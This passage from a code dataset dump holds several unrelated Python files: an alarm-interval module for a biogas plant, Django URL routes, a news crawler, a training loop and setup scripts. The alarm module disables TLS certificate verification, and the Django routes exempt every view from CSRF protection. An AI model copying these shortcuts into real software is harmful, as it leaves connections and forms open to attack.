RequestsHttpConnection as RC\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\nVERSION=\"0.0.2\"\nMODULE=\"GTC_COMPUTE_ALARMS_LUTOSA\"\nQUEUE=[\"COMPUTE_ALARMS_LUTOSA\"]\n\nALARM_LIST = [\n 'Urg_Alm',\n 'Mot_Alm',\n 'Mot_PAl',\n 'Det_Inc_Cog_Alm',\n 'Det_Gaz_Cog_Alm',\n 'Det_Inc_N0_Alm',\n 'Det_Inc_N1_Alm',\n 'Det_Gaz_Dael_Alm',\n 'AnalyBiog_H2S_NH_Av_Cogen',\n 'MqEau_Alm',\n 'AnalyBiog_H2S_NTH_Av_Cogen',\n 'Analy_Av_Thiopaq_Def',\n 'Analy_Ap_Thiopaq_Def',\n 'Analy_Av_Cogen_Def',\n 'AH_HTL_TT13',\n 'AH_HTL_TT04',\n 'AH_LTL_TT01',\n 'AB_EGL_DP01',\n 'AH_HuilMot',\n 'Tpo_Long_GN_Moteur'\n]\n\nNAME_TO_TEXT = {\n 'Urg_Alm': 'Alarme arrêt d urgence',\n 'Mot_Alm': 'Diane: Moteur en alarme',\n 'Mot_PAl': 'Diane: Moteur en préalarme',\n 'Det_Inc_Cog_Alm': 'Détection incendie caisson de la cogen',\n 'Det_Gaz_Cog_Alm': 'Détection gaz caisson de la cogen',\n 'Det_Inc_N0_Alm': 'Détection incendie niveau 0',\n 'Det_Inc_N1_Alm': 'Détection incendie niveau +1',\n 'Det_Gaz_Dael_Alm': 'Détection gaz Daelemans RDC & +1',\n 'AnalyBiog_H2S_NH_Av_Cogen': 'Préalarme analyseur de biogaz: Niveau H2S haut avant cogen',\n 'MqEau_Alm': 'Alarme maque eau circuit HT',\n 'AnalyBiog_H2S_NTH_Av_Cogen': 'Alarme analyseur de biogaz: Niveau H2S très haut avant cogen',\n 'Analy_Av_Thiopaq_Def': 'Défaut analyseur Biogaz avant Thiopaq',\n 'Analy_Ap_Thiopaq_Def': 'Défaut analyseur Biogaz après Thiopaq',\n 'Analy_Av_Cogen_Def': 'Défaut analyseur Biogaz avant Cogen',\n 'AH_HTL_TT13': 'Arrêt moteur sur HTL-TT13: Haute température entrée eau échangeur gaz / eau',\n 'AH_HTL_TT04': 'Arrêt moteur sur HTL-TT04: Haute température départ eau collecteur',\n 'AH_LTL_TT01': 'Arrêt moteur sur LTL-TT01: Haute température entrée eau de refroidissement',\n 'AB_EGL_DP01': 'Arrêt moteur sur EGL-DP01: Bas débit eau sortie échangeur gaz / eau',\n 'AH_HuilMot': 'Arrêt moteur sur haute température d huile moteur',\n 'Tpo_Long_GN_Moteur': 'Arrêt moteur sur temps de fonctionnement trop long 100% GN ou Biogaz trop faible (Reset nécessaire)'\n }\n\nALARM_LIST = ['LUTOSA_'+_ for _ in ALARM_LIST]\nQUERY = 'name:'+' OR name:'.join(ALARM_LIST)\n\ncontainertimezone=pytz.timezone(get_localzone().zone)\n\nSTART = containertimezone.localize(datetime(2019, 10, 24))\n\n\ndef log_message(message):\n global conn\n\n message_to_send={\n \"message\":message,\n \"@timestamp\":datetime.now().timestamp() * 1000,\n \"module\":MODULE,\n \"version\":VERSION\n }\n logger.info(\"LOG_MESSAGE\")\n logger.info(message_to_send)\n conn.send_message(\"/queue/NYX_LOG\",json.dumps(message_to_send))\n\nclass DateTimeEncoder(json.JSONEncoder):\n def default(self, o):\n if isinstance(o, dt.datetime):\n return o.isoformat()\n \n elif isinstance(o, dt.time):\n return o.isoformat()\n\n return json.JSONEncoder.default(self, o)\n\n################################################################################\ndef compute_alarms(alarm_name, df):\n alarm_array = []\n\n intervals=[ list(group) for key, group in groupby(df['value'].values.tolist())]\n index = 0\n\n for i in intervals:\n #logger.info('index: '+str(index))\n\n if index == 0:\n if df.iloc[index]['value'] == 1:\n try:\n #logger.info('try get cache')\n cache_alarm = es.get(index='gtc_alarm_cache', doc_type='doc',id=alarm_name)\n alarm={}\n alarm['start'] = datetime.fromisoformat(cache_alarm['_source']['start'])\n alarm['end'] = df.iloc[index+len(i)-1]['datetime'].to_pydatetime() + timedelta(minutes=1) #+1 minute\n alarm['name'] = alarm_name\n\n if len(df) == (index+len(i)):\n 
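
# --------------------------------------------------------------------------
# Illustrative sketch (separate from the compute_alarms implementation in
# progress above): its core trick is itertools.groupby, which collapses a
# minute-by-minute 0/1 signal into consecutive runs; each run of 1s becomes
# one alarm interval, with the end pushed one minute past the last sample as
# in the module above.  Toy data only.
from datetime import datetime, timedelta
from itertools import groupby

values = [0, 0, 1, 1, 1, 0, 1, 0, 0]          # one sample per minute
t0 = datetime(2019, 10, 24, 0, 0)

intervals = []
index = 0
for key, group in groupby(values):
    run = list(group)
    if key == 1:
        start = t0 + timedelta(minutes=index)
        end = start + timedelta(minutes=len(run))   # +1 min past last sample
        intervals.append((start, end, len(run)))
    index += len(run)

for start, end, minutes in intervals:
    print(start, "->", end, f"({minutes} min)")
# yields two alarms: minutes 2-5 (3 min) and 6-7 (1 min)
# --------------------------------------------------------------------------
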
es.index(index='gtc_alarm_cache', doc_type='doc', id=alarm_name, body=alarm)\n alarm['unfinished'] = 1\n #logger.info('last alarm unfinished -> cached')\n else:\n try:\n #logger.info('try delete cache')\n es.delete(index='gtc_alarm_cache', doc_type='doc', id=alarm_name)\n except:\n logger.info('failed')\n pass\n\n alarm_array.append(alarm)\n except:\n logger.info('failed')\n pass\n\n else:\n if df.iloc[index]['value'] == 1:\n #logger.info(' --> '+str(df.iloc[index]['datetime'])+' --> duration: '+str(len(i)))\n\n alarm={}\n alarm['start'] = df.iloc[index]['datetime'].to_pydatetime()\n alarm['end'] = df.iloc[index+len(i)-1]['datetime'].to_pydatetime() + timedelta(minutes=1)\n alarm['name'] = alarm_name\n\n if len(df) == (index+len(i)):\n alarm['unfinished'] = 1\n es.index(index='gtc_alarm_cache', doc_type='doc', id=alarm_name, body=alarm)\n #logger.info('last alarm unfinished -> cached')\n\n alarm_array.append(alarm)\n\n index+=len(i)\n\n\n bulk_body=''\n for i in alarm_array:\n action = {}\n\n i['duration_minutes'] = int((i['end']-i['start']).total_seconds()/60)\n i['site'] = 'LUTOSA'\n i['site_name'] = i['name']\n i['name'] = i['name'].replace('LUTOSA_', '')\n \n \n try:\n i['text'] = NAME_TO_TEXT[i['name']]\n except:\n logger.warning(str(i['name'])+ ' not in NAME_TO_TEXT dict')\n\n\n action[\"index\"] = {\n \"_index\": 'gtc_alarm', \n \"_type\": \"doc\", \n \"_id\": i['name'] + '_' +str(int(i['start'].timestamp())*1000)\n }\n\n bulk_body += json.dumps(action) + \"\\r\\n\"\n bulk_body += json.dumps(i, cls=DateTimeEncoder) + \"\\r\\n\"\n \n return bulk_body\n\ndef proceed_computation(start):\n logger.info('**********************************************************')\n logger.info('PROCEED COMPUTATION: '+str(start))\n bulkbody = ''\n flag = True\n end = start + timedelta(hours=2)\n \n while flag:\n if end > datetime.now(containertimezone):\n flag=False\n\n\n #bulkbody = '' \n\n df_alarms=es_helper.elastic_to_dataframe(es, \n index='opt_sites_data*', \n query=QUERY, \n start=start, \n end=end)\n\n if len(df_alarms) == 0:\n logger.info('no alarms on this period -> add 2 hours to end')\n end = end + timedelta(hours=2)\n else:\n logger.info('-'+str(start))\n logger.info('-'+str(end))\n logger.info('-------')\n df_alarms['datetime'] = pd.to_datetime(df_alarms['@timestamp'], unit=\"ms\", utc=True) \\\n .dt.tz_convert('Europe/Paris')\n\n if len(df_alarms) == 0:\n logger.info('NO DATA') \n\n df_alarms = df_alarms.sort_values('@timestamp')\n\n df = df_alarms[['@timestamp', 'datetime', 'client', 'name', 'value']]\n\n for alarm in df['name'].unique():\n #logger.info(alarm)\n df_filtered = df[df['name']==alarm]\n\n if len(df_filtered) > 0:\n bulkbody += compute_alarms(alarm, df_filtered)\n\n\n\n if start == max(df['datetime']).to_pydatetime():\n logger.info('big hole')\n\n obj = {\n 'start': str(start),\n 'end': str(end),\n }\n\n conn.send_message('/topic/ALARMS_MISSING_DATA', json.dumps(obj))\n\n end = end + timedelta(hours=2)\n else:\n start = max(df['datetime']).to_pydatetime()\n end = start + timedelta(hours=2)\n \n\n if bulkbody != '': \n bulkres=es.bulk(bulkbody)\n \n if(not(bulkres[\"errors\"])):\n logger.info(\"BULK done without errors.\")\n else:\n for item in bulkres[\"items\"]:\n if \"error\" in item[\"index\"]:\n logger.info(item[\"index\"][\"error\"])\n \n \n return start\n\n\n\n\n################################################################################\ndef messageReceived(destination,message,headers):\n global es\n logger.info(\"==> \"*10)\n logger.info(\"Message Received %s\" % 
destination)\n logger.info(message)\n logger.info(\"<== \"*10)\n \n\nlogging.basicConfig(level=logging.INFO,format='%(asctime)s %(levelname)s %(module)s - %(funcName)s: %(message)s', datefmt=\"%Y-%m-%d %H:%M:%S\")\nlogger = logging.getLogger()\n\nlshandler=None\n\nif os.environ[\"USE_LOGSTASH\"]==\"true\":\n logger.info (\"Adding logstash appender\")\n lshandler=AsynchronousLogstashHandler(\"logstash\", 5001, database_path='logstash_test.db')\n lshandler.setLevel(logging.ERROR)\n logger.addHandler(lshandler)\n\nhandler = TimedRotatingFileHandler(\"logs/\"+MODULE+\".log\",\n when=\"d\",\n interval=1,\n backupCount=30)\n\nlogFormatter = logging.Formatter('%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s')\nhandler.setFormatter( logFormatter )\nlogger.addHandler(handler)\n\nlogger.info(\"==============================\")\nlogger.info(\"Starting: %s\" % MODULE)\nlogger.info(\"Module: %s\" %(VERSION))\nlogger.info(\"==============================\")\n\n#>> AMQC\nserver={\"ip\":os.environ[\"AMQC_URL\"],\"port\":os.environ[\"AMQC_PORT\"]\n ,\"login\":os.environ[\"AMQC_LOGIN\"],\"password\":os.environ[\"AMQC_PASSWORD\"]}\nlogger.info(server) \nconn=amqstompclient.AMQClient(server\n , {\"name\":MODULE,\"version\":VERSION,\"lifesign\":\"/topic/NYX_MODULE_INFO\"},QUEUE,callback=messageReceived)\n#conn,listener= amqHelper.init_amq_connection(activemq_address, activemq_port, activemq_user,activemq_password, \"RestAPI\",VERSION,messageReceived)\nconnectionparameters={\"conn\":conn}\n\n#>> ELK\nes=None\nlogger.info (os.environ[\"ELK_SSL\"])\n\nif os.environ[\"ELK_SSL\"]==\"true\":\n host_params = {'host':os.environ[\"ELK_URL\"], 'port':int(os.environ[\"ELK_PORT\"]), 'use_ssl':True}\n es = ES([host_params], connection_class=RC, http_auth=(os.environ[\"ELK_LOGIN\"], os.environ[\"ELK_PASSWORD\"]), use_ssl=True ,verify_certs=False)\nelse:\n host_params=\"http://\"+os.environ[\"ELK_URL\"]+\":\"+os.environ[\"ELK_PORT\"]\n es = ES(hosts=[host_params])\n\n\n\nif __name__ == '__main__': \n logger.info(\"AMQC_URL :\"+os.environ[\"AMQC_URL\"])\n\n SECONDSBETWEENCHECKS=120\n es.indices.delete(index='gtc_alarm_cache', ignore=[400, 404]) \n\n nextload=datetime.now()\n\n while True:\n time.sleep(5)\n try: \n variables={\"platform\":\"_/_\".join(platform.uname()),\"icon\":\"list-alt\"}\n \n conn.send_life_sign(variables=variables)\n\n if (datetime.now() > nextload):\n try:\n nextload=datetime.now()+timedelta(seconds=SECONDSBETWEENCHECKS)\n SECONDSBETWEENCHECKS = 60\n START = proceed_computation(START)\n \n except Exception as e2:\n logger.error(\"Error compute alarm Lutosa.\")\n logger.error(e2,exc_info=True)\n \n except Exception as e:\n logger.error(\"Unable to send life sign.\")\n logger.error(e)\n","sub_path":"sources/gtc_compute_alarms_lutosa.py","file_name":"gtc_compute_alarms_lutosa.py","file_ext":"py","file_size_in_byte":12918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"281325973","text":"from django.conf.urls import url\n\nfrom submissions.views import SubmissionCreateView, SubmissionMarkView, CriteriaCreateView, \\\n CriteriaListView, CommentCreateView, AssignmentAutomarkingView, SubmissionResultView, SubmissionModifyView, \\\n CommentListView, SubmissionToggleView\nfrom django.views.decorators.csrf import csrf_exempt\n\nurlpatterns = [\n url(r'^create$', csrf_exempt(SubmissionCreateView.as_view()), name='submission-create'),\n url(r'^criteria/create$', csrf_exempt(CriteriaCreateView.as_view()), name='criteria-create'),\n 
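
# --------------------------------------------------------------------------
# Illustrative sketch (hypothetical app, not the submissions app above): with
# Django's url(), a named regex group such as (?P<submission_id>\d+) is passed
# to the view as a keyword argument, and the pattern's name makes the URL
# reversible; csrf_exempt(View.as_view()) simply wraps the resolved callable.
# Requires a configured Django project to actually resolve.
from django.conf.urls import url
from django.http import HttpResponse
from django.views import View
from django.views.decorators.csrf import csrf_exempt

class EchoView(View):
    def get(self, request, submission_id):
        return HttpResponse("submission %s" % submission_id)

urlpatterns = [
    url(r'^echo/(?P<submission_id>\d+)$', csrf_exempt(EchoView.as_view()),
        name='echo'),
]

# reverse('echo', kwargs={'submission_id': 42}) -> '/echo/42'
# --------------------------------------------------------------------------
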
url(r'^criteria/(?P\\d+)$', csrf_exempt(CriteriaListView.as_view()), name='criteria-list'),\n url(r'^comment/create$', csrf_exempt(CommentCreateView.as_view()), name='comment-create'),\n url(r'^comment/(?P\\d+)', csrf_exempt(CommentListView.as_view()), name='comment-list'),\n url(r'^mark/(?P\\d+)/(?P\\d*)?/$', csrf_exempt(SubmissionMarkView.as_view()), name='submission-mark'),\n url(r'^result/(?P\\d+)/(?P\\d*)?/$', csrf_exempt(SubmissionResultView.as_view()), name='submission-result'),\n url(r'^automark/(?P\\d+)$', csrf_exempt(AssignmentAutomarkingView.as_view()), name='automark-assign'),\n url(r'^automark/(?P\\d+)/(?P\\d+)$', csrf_exempt(AssignmentAutomarkingView.as_view()), name='automark-submission'),\n url(r'^modifysubmission', csrf_exempt(SubmissionModifyView.as_view()), name='modify-submission'),\n url(r'^togglesubmission', csrf_exempt(SubmissionToggleView.as_view()), name='toggle-submission'),\n]\n","sub_path":"submissions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"584519390","text":"#!/usr/bin/python\n# coding: utf8\n\n\"\"\"\n@author twpDone / twp_zero\n@file pycrawl.py\nParser pour la veille, il parcours les pages et collecte les associations keyword/lien url.\nLe but et de pouvoir afficher les articles pour un mot clé, et d'eviter de lire 20 fois des contenus similaires.\n\n\"\"\"\n\n# import des modules de parsage d'arguments, de fichiers de configuration \n# et la lib url pour le parcours des liens\nimport argparse, ConfigParser, urllib2\n# Classe de parsage\nfrom HTMLParser import HTMLParser\n# Methode pour créer des liens absolus.\nfrom urlparse import urljoin\nimport re\n\n# Nom par defaut du fichier de conf\nCONFIG_FILE=\"crawl.conf\"\n\ndef genConfigFile(cp):\n \"\"\"\n @function genConfigFile\n Genere le fichier de configuration par defaut\n @param cp Objet ConfigParser \n \"\"\"\n global CONFIG_FILE\n \n # Liste des sources\n cp.add_section(\"Seeds\")\n cp.set(\"Seeds\",\"sourcesList\",\"http://www.securityweek.com/cybercrime, https://threatpost.com/\")\n \n # Gestion des mots en liste noire\n cp.add_section(\"Words\")\n cp.set(\"Words\",\"wordBlacklist\",\"all,to,on,cyber,led,more,can,threatpost,how,lab,data,a,not,featured,story,management,that,and,are,be,news,is,it,in,make,the,latest,for,of,or,off,with,us,you,read,security,wrap,cow,as,under,did,list,item,what,tags,let,forum,use,names,so,nor,suits,learn,didnt,write,le,foo,might,day,re,days,uses,one,their,any,also,take,see,article,been,an,say,look,if,via,know,known,some,election,sight,step,run,from,for,your,there,don,but,year,years,tip,at,why,vow,using,by\")\n \n # ouverture et écriture du ficher de conf\n f=open(CONFIG_FILE,\"w\")\n cp.write(f)\n f.close()\n\ndef readConfigFile(cp):\n \"\"\"\n @function readConfigFile\n Lit le fichier de configuration par defaut\n @param cp Objet ConfigParser \n \"\"\"\n global CONFIG_FILE\n cp.read(CONFIG_FILE)\n\ndef getConfigWordsBlackList(cp):\n \"\"\"\n @function getConfigWordsBlackList\n Recupere dans le fichier de config la list des mots blacklistés\n @param cp Objet ConfigParser \n @return List unicode wordBlackList\n @raise Exception Erreur de lecture du fichier\n \"\"\"\n if cp.has_section(\"Words\"):\n try : \n return cp.get(\"Words\",\"wordBlacklist\").decode(\"utf8\",errors=\"replace\").split(\",\")\n except Exception as ex:\n raise ex\n\ndef getConfigSourcesList(cp):\n \"\"\"\n @function getConfigSourcesList\n Recupere dans le fichier de 
def getConfigSourcesList(cp):\n    \"\"\"\n    @function getConfigSourcesList\n    Fetches from the config file the list of sites to parse\n    @param cp ConfigParser object\n    @return List unicode sourcesList\n    @raise Exception Error while reading the file\n    \"\"\"\n    if cp.has_section(\"Seeds\"):\n        try : \n            return cp.get(\"Seeds\",\"sourcesList\").decode(\"utf8\",errors=\"replace\").split(\",\")\n        except Exception as ex:\n            raise ex\n\nfrom NewsParser import *\nfrom Engine import *\nfrom Observer import *\nimport json\n\ndef jsonDump(self):\n    return self.__dict__\n\ndef save():\n    global eng\n    global obs\n    f=open(\"register.dump\",\"w\")\n    json.dump(obs.register,f)\n    f.close()\n    f=open(\"links.dump\",\"w\")\n    json.dump(eng.links,f)\n    f.close()\n\ndef restore():\n    global eng\n    global obs\n    try :\n        f=open(\"register.dump\",\"r\")\n        obs.setRegister(json.load(f))\n        f.close()\n    except:\n        pass\n    try :\n        f=open(\"links.dump\",\"r\")\n        links=json.load(f)\n        obs.seen = links.keys()\n        eng.links = links\n        f.close()\n    except:\n        pass\n\ndef crawl():\n    global np\n    np.crawl()\n### MAIN ###\n\ncp=ConfigParser.ConfigParser()\n#genConfigFile(cp)\nreadConfigFile(cp)\n\nseedsList=getConfigSourcesList(cp)\nblackList=getConfigWordsBlackList(cp)\n\neng=Engine()\neng.setWordBlackList(blackList)\n\nnp=NewsParser(seedsList, engine=eng)\nobs = Observer(eng)\n\nif __name__==\"__main__\":\n    restore()\n    crawl()\n    obs.notify()\n    save()\n\n    print(\"\\n\\n KeyWords : \")\n    eng.printKeyWords(5)\n    #eng.listWords()\n    print(\"\\n\")\n","sub_path":"pycrawl.py","file_name":"pycrawl.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"585420989","text":"from tqdm import tqdm\n\nimport torch\ntry:\n    from apex import amp\nexcept ImportError:\n    pass\n\n\ndef train_loop(model, loss_func, optimizer, train_dataloader, logger, args, mean, std):\n    model.train()\n    part_loss = total_loss = 0\n\n    for param_group in optimizer.param_groups:\n        print(\"Current learning rate: \", param_group['lr'])\n\n    for nbatch, data in enumerate(tqdm(train_dataloader)):\n        img = data['image']\n        img = torch.Tensor(img).cuda()\n        img.sub_(mean).div_(std)\n\n        ground_truth = data['ground_truth'].cuda()\n\n        output = model(img)\n\n        loss = loss_func(output, ground_truth)\n        total_loss += loss.item()\n        part_loss += loss.item()\n\n        if (nbatch+1) % (len(train_dataloader) // 10) == 0:\n            print(\"Average loss this epoch: {}\".format(part_loss / (len(train_dataloader) // 10)))\n            part_loss = 0\n\n        optimizer.zero_grad()\n        if args.amp:\n            with amp.scale_loss(loss, optimizer) as scale_loss:\n                scale_loss.backward()\n        else:\n            loss.backward()\n\n        optimizer.step()\n\n        # if epoch == 1 and nbatch > len(train_dataloader)/10:\n        #     break\n\n    print(\"Average loss this epoch: {}\".format(total_loss/len(train_dataloader)))\n\n    return total_loss/len(train_dataloader)\n\n\ndef load_checkpoint(file_path, model, optimizer=None, scheduler=None):\n    \"\"\"\n    Load model, optimizer, scheduler and the last epoch from checkpoint\n    \"\"\"\n    checkpoint = torch.load(file_path, map_location=\"cuda:0\")\n\n    model.load_state_dict(checkpoint['model'])\n    scheduler.load_state_dict(checkpoint['scheduler'])\n    optimizer.load_state_dict(checkpoint['optimizer'])\n    start_epoch = checkpoint.get('epoch', 0)\n    print('Model loaded successfully')\n\n    return model, optimizer, scheduler, start_epoch\n","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
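
# --------------------------------------------------------------------------
# Illustrative sketch (not part of the train.py record above): the same mixed-
# precision pattern expressed with torch.cuda.amp, which superseded the
# apex.amp API used there.  Tiny synthetic model and data so the loop is
# self-contained; falls back to plain FP32 when no GPU is present.
import torch
from torch import nn

model = nn.Linear(10, 1)
opt = torch.optim.SGD(model.parameters(), lr=0.1)
loss_fn = nn.MSELoss()
use_cuda = torch.cuda.is_available()
scaler = torch.cuda.amp.GradScaler(enabled=use_cuda)

x = torch.randn(32, 10)
y = torch.randn(32, 1)
if use_cuda:
    model, x, y = model.cuda(), x.cuda(), y.cuda()

for step in range(3):
    opt.zero_grad()
    with torch.cuda.amp.autocast(enabled=use_cuda):
        loss = loss_fn(model(x), y)
    scaler.scale(loss).backward()   # scaled backward, like amp.scale_loss
    scaler.step(opt)
    scaler.update()
    print(step, loss.item())
# --------------------------------------------------------------------------
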
+{"seq_id":"300453510","text":"from cx_Freeze import *\r\nimport sys\r\nbase = None\r\nif sys.platform == 'win32':  # platform strings are lowercase\r\n    base = 'Win32GUI'\r\n# MSI Shortcut table row; field layout follows the Windows Installer Shortcut table\r\nshortcut_table = [('DesktopShortcut',                  # Shortcut\r\n                   'DesktopFolder',                    # Directory_\r\n                   'My calculator',                    # Name\r\n                   'TARGETDIR',                        # Component_\r\n                   '[TARGETDIR]Smartcalculator.exe',   # Target\r\n                   None,                               # Arguments\r\n                   None,                               # Description\r\n                   None,                               # Hotkey\r\n                   None,                               # Icon\r\n                   None,                               # IconIndex\r\n                   None,                               # ShowCmd\r\n                   'TARGETDIR')]                       # WkDir\r\nmsi_data = {'Shortcut': shortcut_table}\r\nbdist_msi_options = {'data': msi_data}\r\n\r\nsetup(\r\n    # the actual setup & the definition of other misc. info\r\n    name = \"Hello\", # the program name\r\n    version = \"0.1\",\r\n    description = \"Smart calculator\",\r\n    author = \"sahaj\",\r\n    author_email = \"sahajdeeep8949@email.com\",\r\n    options={\r\n        \"bdist_msi\": bdist_msi_options,\r\n    },\r\n\r\n    executables = [\r\n        Executable(script='Smartcalculator.py',  # assumes the frozen script is Smartcalculator.py\r\n                   base=base,\r\n                   icon=None)\r\n    ]\r\n)\r\n","sub_path":"SmartcalculatorSet.py","file_name":"SmartcalculatorSet.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"449901899","text":"\"\"\"\nproblem.py\n\"\"\"\nimport ConfigSpace as cs\n\nfrom deephyper.problem import HpProblem\n\nProblem = HpProblem()\n\n# call signature: Problem.add_dim(name, value)\nProblem.add_dim('units1', (1, 64)) # int in range 1-64\nProblem.add_dim('units2', (1, 64)) # int in range 1-64\nProblem.add_dim('dropout1', (0.0, 1.0)) # float in range 0-1\nProblem.add_dim('dropout2', (0.0, 1.0)) # float in range 0-1\nProblem.add_dim('batch_size', (5, 500)) # int in range 5-500\nProblem.add_dim('log10_learning_rate', (-5.0, 0.0)) # float lr range from 10^-5 to 1\n\n# one of ['relu', ..., ]\nProblem.add_dim('activation', ['relu', 'elu', 'selu', 'tanh'])\n\noptimizer = Problem.add_dim('optimizer', [\n    'Adam', 'RMSprop', 'SGD', 'Nadam', 'Adagrad'\n])\n\n# Only vary momentum if optimizer is SGD\nmomentum = Problem.add_dim(\"momentum\", (0.5, 0.9))\nProblem.add_condition(cs.EqualsCondition(momentum, optimizer, \"SGD\"))\n\n# Add a starting point to try first\nProblem.add_starting_point(\n    units1=16,\n    units2=32,\n    dropout1=0.0,\n    dropout2=0.0,\n    batch_size=16,\n    activation='relu',\n    optimizer='SGD',\n    log10_learning_rate=-3.0,\n    momentum=0.5,\n)\n\n\nif __name__ == \"__main__\":\n    print(Problem)\n","sub_path":"03_distributedHyperOpt/01_BasicHPS/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"96988157","text":"\n\nfrom xai.brain.wordbase.nouns._nectarine import _NECTARINE\n\n#class header\nclass _NECTARINES(_NECTARINE):\n\tdef __init__(self): \n\t\t_NECTARINE.__init__(self)\n\t\tself.name = \"NECTARINES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"nectarine\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_nectarines.py","file_name":"_nectarines.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42207898","text":"__authors__ = \"\"\n__copyright__ = \"(c) 2014, pymal\"\n__license__ = \"BSD License\"\n__contact__ = \"Name Of Current Guardian of this file \"\n\nfrom pymal import exceptions\n\n\nclass Recommendation(object):\n    \"\"\"\n    Recommendation holds all the data from a recommendation in MAL about an anime.\n\n    :ivar recommended_anime: :class:`anime.Anime`\n    :ivar recommends: :class:`dict`\n    \"\"\"\n    def __init__(self, div):\n        \"\"\"\n        :param div: The div of the 
recommendation to parse all the data from it.\n :type div: bs4.element.Tag\n \"\"\"\n from pymal import account, anime\n\n recommended, recommends_divs = div.table.tbody.tr.findAll(name=\"td\", recursive=False)\n\n self.recommended_anime = anime.Anime(int(recommended.div.a[\"href\"].split('/')[2]))\n\n data = recommends_divs.findAll(name=\"div\", recursive=False)\n if 3 == len(data):\n recommends = [data[2]]\n elif 5 == len(data):\n _, _, first_recommend, _, other_recommends = data\n recommends = [first_recommend] + other_recommends.findAll(name=\"div\", recursive=False)\n else:\n raise exceptions.FailedToReloadError( \"Unknown size of data: \" + str(len(data)))\n\n self.recommends = dict()\n\n for recommend in recommends:\n recommend_data, user_data = recommend.findAll(name=\"div\", recursive=False)\n username = user_data.find(name='a', recursive=False)[\"href\"].split('/')[2]\n self.recommends[account.Account(username)] = recommend_data.text\n\n def __repr__(self):\n return \"<{0:s} for {1:s} by {2:d} users>\".format(\n self.__class__.__name__,\n self.recommended_anime,\n len(self.recommends)\n )\n","sub_path":"pymal/inner_objects/recommendation.py","file_name":"recommendation.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"10628900","text":"#!/usr/bin/env python\n\"\"\"Python script to create a copy of global configs.\n\nIt's assumed that datasmart project must be importable through `datasmart` (not a submodule)\n\"\"\"\n\nimport shutil\nimport os.path\nimport sys\nfrom datasmart.config.core import __path__ as pkg_to_copy_from_path\nimport pkgutil\n\n\ndef main():\n assert sys.version_info >= (3, 5), \"you must have at least Python 3.5 to run this!\"\n # current_dir = sys.path[0]\n # assert (os.path.isabs(current_dir))\n dir_to_copy_to = os.path.join(os.path.expanduser(\"~\"), \".datasmart\", 'config', 'core')\n if os.path.exists(dir_to_copy_to):\n print(\"old core config file exists! do you want to really remove them and use default ones?\")\n answer = input(\"type y to confirm, otherwise the program will exit\")\n if answer == 'y':\n shutil.rmtree(dir_to_copy_to)\n else:\n return\n core_pkgs_to_copy_names = [x[1] for x in pkgutil.iter_modules(pkg_to_copy_from_path)]\n print(core_pkgs_to_copy_names)\n core_pkgs_to_copy_filecontent = []\n # for each one, copy its config.json\n print('in total {} packages to work on.'.format(len(core_pkgs_to_copy_names)))\n for pkg in core_pkgs_to_copy_names:\n # read out the content of config file.\n pkg_full = 'datasmart.config.core.' 
+ pkg\n content_this = pkgutil.get_data(pkg_full, 'config.json')\n assert content_this is not None, \"config file for {} does not exist!\".format(pkg_full)\n core_pkgs_to_copy_filecontent.append(content_this)\n\n assert not os.path.exists(dir_to_copy_to)\n os.makedirs(dir_to_copy_to) # create all intermediate ones if necessary.\n\n for idx, (pkg, content) in enumerate(zip(core_pkgs_to_copy_names, core_pkgs_to_copy_filecontent), start=1):\n pkg_dir = os.path.join(dir_to_copy_to, pkg)\n pkg_config_path = os.path.join(pkg_dir, 'config.json')\n os.mkdir(pkg_dir)\n with open(pkg_config_path, 'wb') as f_this:\n f_this.write(content)\n print('{}/{}: {} done'.format(idx, len(core_pkgs_to_copy_names), pkg))\n\n print(\"done!\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"install_config_core.py","file_name":"install_config_core.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"40058800","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'alex barnes'\n\n\nclass Plugboard(object):\n\n def __init__(self, wires = \"\"):\n if (len(wires) % 2 != 0) or (wires.isalpha() is False) or (len(wires) > 20) or (len(wires) < 2):\n raise ValueError('Must input an even number of up to 20 alpha characters.')\n else:\n self.pairKey = {}\n self.populate_key(wires)\n\n def populate_key(self, pairs):\n self.pairKey = {}\n pairsList = list(pairs)\n while len(pairsList) > 0:\n k = pairsList.pop(0)\n v = pairsList.pop(0)\n self.wire(k, v)\n\n def wire(self, k, v):\n k = k.upper()\n v = v.upper()\n self.pairKey[k] = v\n self.pairKey[v] = k\n\n def process(self, letter):\n try:\n return self.pairKey[letter[0].upper()]\n except KeyError:\n return letter\n\nif __name__ == \"__main__\":\n plugboard = Plugboard(\"ABCDEFGHIJKLMNOPQRST\")\n assert plugboard.process(\"A\") == \"B\"\n assert plugboard.process(\"B\") == \"A\"\n assert plugboard.process(\"X\") == \"X\"\n assert plugboard.process(\".\") == \".\"\n","sub_path":"plugboard.py","file_name":"plugboard.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"173163654","text":"#%%\nimport numpy as np \nimport pandas as pd \nimport os\nimport 